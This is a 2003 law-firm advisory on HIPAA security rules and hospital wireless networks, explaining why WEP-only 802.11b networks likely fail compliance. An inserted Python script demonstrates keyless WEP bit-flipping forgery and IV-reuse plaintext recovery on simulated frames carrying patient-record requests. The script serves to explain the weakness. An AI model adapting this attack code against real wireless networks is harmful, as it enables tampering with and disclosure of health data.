HIPAA AND WIFI REGULATORY TANGLES FOR WIRELESS HEALTH CARE NETWORKS
By Randy Gainer, Michael van Eckhardt, Rebecca L. Williams, and Richard D. Marks
[June 2003]
New uses for wireless devices in health care administration, practice
management, and clinical care are heralded almost daily in the health
care press. Wireless networks are being deployed to allow physicians
and nurses to access patient records from central databases while
on rounds, to add observations to the databases and to check on
medications, among a growing number of other functions.
The growing use of wireless networks by health care professionals
presents tremendous challenges to health care IT managers. One of
the fundamental axioms of IT is that there is a tradeoff between
access and security: easier access translates to greater security
risks. True to this axiom, the ease of access that wireless networks
offer is matched by the security challenges those networks present.
Decisions made today about the deployment of wireless local area
networks (WLANs) must take into account the impact of the administrative
simplifications of the Health Insurance Portability and Accountability
Act of 1996 (HIPAA).
HIPAA Requirements
The HIPAA statute requires health plans, health care providers,
and other covered entities to maintain reasonable and appropriate
safeguards to protect individually identifiable health information.
Under the HIPAA privacy rules, a covered entity must have in place
appropriate administrative, technical, and physical safeguards to
protect the privacy of electronic and non-electronic protected health
information. A court asked to determine the meaning of "appropriate
safeguards" under this "mini security rule" may well
refer to the principles and requirements of the security rules to
determine what safeguards an entity should have implemented.
The HIPAA security rules were issued in final form on February
20, 2003. They apply to protected health information in electronic
form only. The core principles of the final rules require covered
entities to: (1) ensure the confidentiality, integrity, and availability
of all electronic protected health information the covered entity
creates, receives, maintains, or transmits; (2) protect against
any reasonably anticipated threats or hazards to the security or
integrity of such information; (3) protect against any reasonably
anticipated uses or disclosures of such information that are not
permitted or required under [the security rules]; and (4) ensure
compliance with the [security rules] by its workforce.
The final security rules offer some flexibility to covered entities
attempting to comply with these requirements, however. For example,
covered entities may use any security measures that allow the covered
entity to reasonably and appropriately implement the standards and
implementation specifications as specified in the security rules.
The requirement that covered entities ensure the integrity
and confidentiality of health information against reasonably anticipated
threats or hazards, however, creates a very high legal and practical
standard. The attacks of September 11, 2001, and a number of well
publicized incidents of identity thefts made possible by the theft
of electronic consumer data, may well have raised the bar even higher
regarding what is reasonable and appropriate to protect confidential
information of all kinds.
The penalties for violating HIPAA range from $100 per person per
incident for run-of-the-mill improper disclosures of health information
to $250,000 and 10 years in prison for intentional violations. Statutory
penalties may be the least of a covered entity's worries, however,
if lax security allows health information to be stolen. There is
also a risk of class action lawsuits and, of course, damage to the
entity's reputation.
The Security Rules Affect How WLANs Should Be Implemented
The security rules require covered entities to conduct an assessment
of potential risks and vulnerabilities and to implement, and
revisit from time to time, security measures sufficient to reduce
such risks and vulnerabilities.
If a covered entity assesses the security risks inherent in transmitting
protected health information over wireless networks, it will learn
that well-known technical deficiencies in the security features
of 802.11b technology likely make the technology inadequate unless
it is enhanced. Required technical safeguards that are not met by
standard 802.11b wireless network security features include the
requirements to implement unique user identification, encryption
and decryption, person and entity authentication, and transmission
security. The main reason that these requirements cannot be satisfied
by deploying only 802.11b technology is that the encryption protocol
built into 802.11 products, called Wired Equivalent Privacy (WEP),
is fundamentally flawed. WEP encrypts every frame with the RC4 stream
cipher under a single shared key that is the same for every user and
every device, so it offers no unique user identification and no mutual
authentication of device and network. Its 24-bit per-frame initialization
vector is reused on a busy network within hours, and reuse lets an
eavesdropper recover the contents of frames without the key. Its
integrity check is a CRC-32, which is linear, so an attacker can alter
bits of an encrypted frame and adjust the check value without detection.
Finally, weaknesses in the way RC4 is keyed, published in 2001, allow
the shared key itself to be recovered from passively captured traffic.
These deficiencies have been widely publicized, and freely available
tools exploit them.
Because the deficiencies in WEP are serious and well-known, a covered
entity risks being deemed to not be in compliance with HIPAA requirements
if it relies on WEP alone to protect the confidentiality and integrity
of data transmitted over wireless networks.
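To make concrete why WEP alone cannot satisfy the integrity and confidentiality requirements described above, the following Python script is an added example written for this bulletin; it is not code from the article or from any vendor product. It models a WEP data frame in simplified form (an RC4 keystream derived from a 3-byte IV prepended to a 40-bit shared key, with a CRC-32 integrity check value appended to the plaintext) and shows two of the well-publicized weaknesses: an attacker who never learns the key can flip chosen bits in a captured frame and fix up the encrypted integrity check so the receiver accepts it, and two frames sent under the same IV (unavoidable with a 24-bit IV space) leak each other's contents. The key, IV, and request strings are constructed sample values.

```python
import struct
import zlib

# Simplified model of a WEP data frame (illustration only, not a full
# 802.11 implementation): per-frame RC4 key = IV (3 bytes) || shared key,
# keystream XORed over plaintext || ICV, where ICV = CRC-32 of the plaintext.


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation), as WEP uses it."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Sender: return iv || RC4(iv || key, plaintext || CRC32(plaintext))."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + rc4(iv + shared_key, plaintext + icv)


def wep_decrypt(shared_key: bytes, frame: bytes):
    """Receiver: decrypt a frame and return (plaintext, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    dec = rc4(iv + shared_key, body)
    plaintext, icv = dec[:-4], dec[-4:]
    ok = struct.unpack("<I", icv)[0] == (zlib.crc32(plaintext) & 0xFFFFFFFF)
    return plaintext, ok


def flip_bits_without_key(frame: bytes, delta: bytes) -> bytes:
    """Attacker: XOR `delta` into the encrypted payload and patch the
    encrypted ICV so the receiver's check still passes. CRC-32 is affine
    over GF(2): crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros), so the change
    needed in the ICV is crc(delta) ^ crc(zeros), independent of the key."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4  # payload length without the 4-byte ICV
    assert len(delta) == n, "delta must cover the whole payload"
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(bytes(n))) & 0xFFFFFFFF
    mask = delta + struct.pack("<I", icv_delta)
    return iv + bytes(b ^ m for b, m in zip(body, mask))


def recover_from_iv_reuse(frame_a: bytes, known_plain_a: bytes, frame_b: bytes) -> bytes:
    """Attacker: frames under the same IV share a keystream, so
    C_a ^ C_b == P_a ^ P_b. Knowing P_a (or guessing a header) yields
    that many bytes of keystream, and hence of P_b, without the key."""
    assert frame_a[:3] == frame_b[:3], "demonstration needs a repeated IV"
    keystream = bytes(c ^ p for c, p in zip(frame_a[3:], known_plain_a))
    return bytes(c ^ k for c, k in zip(frame_b[3:], keystream))


# Constructed sample values for the demonstrations below.
SHARED_KEY = bytes.fromhex("0badc0ffee")  # 40-bit WEP key (constructed)
IV = b"\x01\x02\x03"                        # 24-bit IV (constructed)


def demo_bit_flip():
    """Change a record lookup for patient 1042 into one for 1043 without the key."""
    msg = b"GET /patient/1042 HTTP/1.0"  # constructed sample request
    frame = wep_encrypt(SHARED_KEY, IV, msg)
    delta = bytearray(len(msg))
    delta[msg.index(b"1042") + 3] = ord("2") ^ ord("3")  # flip '2' -> '3'
    forged = flip_bits_without_key(frame, bytes(delta))
    return wep_decrypt(SHARED_KEY, forged)  # (b"...1043...", True)


def demo_iv_reuse():
    """Recover a second frame's plaintext from a first frame with the same IV."""
    p_a = b"GET /patient/1042 HTTP/1.0"  # known (or guessed) plaintext
    p_b = b"GET /patient/7781 HTTP/1.0"  # the frame the attacker wants
    frame_a = wep_encrypt(SHARED_KEY, IV, p_a)
    frame_b = wep_encrypt(SHARED_KEY, IV, p_b)  # same IV reused
    return recover_from_iv_reuse(frame_a, p_a, frame_b)


if __name__ == "__main__":
    print("bit flip accepted by receiver:", demo_bit_flip())
    print("recovered from IV reuse:", demo_iv_reuse())
```

Both attacks work without the shared key and regardless of key length, which is why longer "128-bit" WEP keys do not cure the problem; they follow from the construction itself (a stream cipher with a short, reused IV and a linear integrity check), and that construction is what WPA and 802.11i replace.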
Additionally, covered entities must implement policies and procedures
to safeguard equipment from unauthorized physical access, tampering
and theft. Special attention should be paid to the danger inherent
in the theft of a wireless device that may provide a thief unauthorized
access to protected health information.
Should You Wait to Install or Upgrade Your WLAN?
There are several ways that WLANs are being deployed to make them
more secure. These are discussed in more detail in the full article,
which is available at http://www.dwt.com/practc/hc_ecom/bulletins/05-03_BNAarticle.htm.
Covered health care entities need to consider whether they should
postpone deploying an initial WLAN or upgrading an insecure, WEP-based
WLAN, until planned changes in wireless network standards are adopted
and have been implemented in commercial products. The Institute of
Electrical and Electronics Engineers (IEEE) has announced that it
plans to adopt the 802.11g specification this summer and is working
on the 802.11i security specification. Some 802.11g products that were
released before the standard was finalized have had inadequate security
features, and some 802.11g products have proven not to be compatible
with 802.11b equipment. Presumably 802.11g products developed after
the 802.11g standard is released will not suffer from interoperability
problems. Note, however, that 802.11g changes only the radio layer and
by itself adds nothing to security. An 802.11g network will be more
secure than an 802.11b network only if it is deployed using Wi-Fi
Protected Access (WPA), the Wi-Fi Alliance's interim profile of the
draft 802.11i standard, rather than WEP; WPA is also available as a
firmware upgrade for many existing 802.11b products, so the decision
to replace WEP need not wait for new hardware.
Those who are charged with maintaining the security of health care
information systems carry a heavy burden. Because technology changes
constantly, the HIPAA security rules require covered entity managers and
their lawyers to regularly evaluate the impact of those changes on the
security of their networks.
To Review the Article
Our underlying article, No Rest for the Wary, was published by BNA's
Electronic Commerce & Law Report, Vol. 8, No. 20, on May 21, 2003, and
is available at http://www.dwt.com/practc/hc_ecom/bulletins/05-03_BNAarticle.htm.
For Further Information, Please Contact:
Randy Gainer, Seattle,
(206) 628-7660, randygainer@dwt.com
Rebecca L. Williams,
Seattle, (206) 628-7769, beckywilliams@dwt.com
This Health Law Advisory is a publication
of the Health Law Department of Davis Wright Tremaine LLP. Our purpose
in publishing this Advisory is to inform our clients and friends
of recent developments in health law. It is not intended, nor should
it be used, as a substitute for specific legal advice as legal counsel
may only be given in response to inquiries regarding particular
situations.
Copyright © 2003, Davis Wright Tremaine LLP.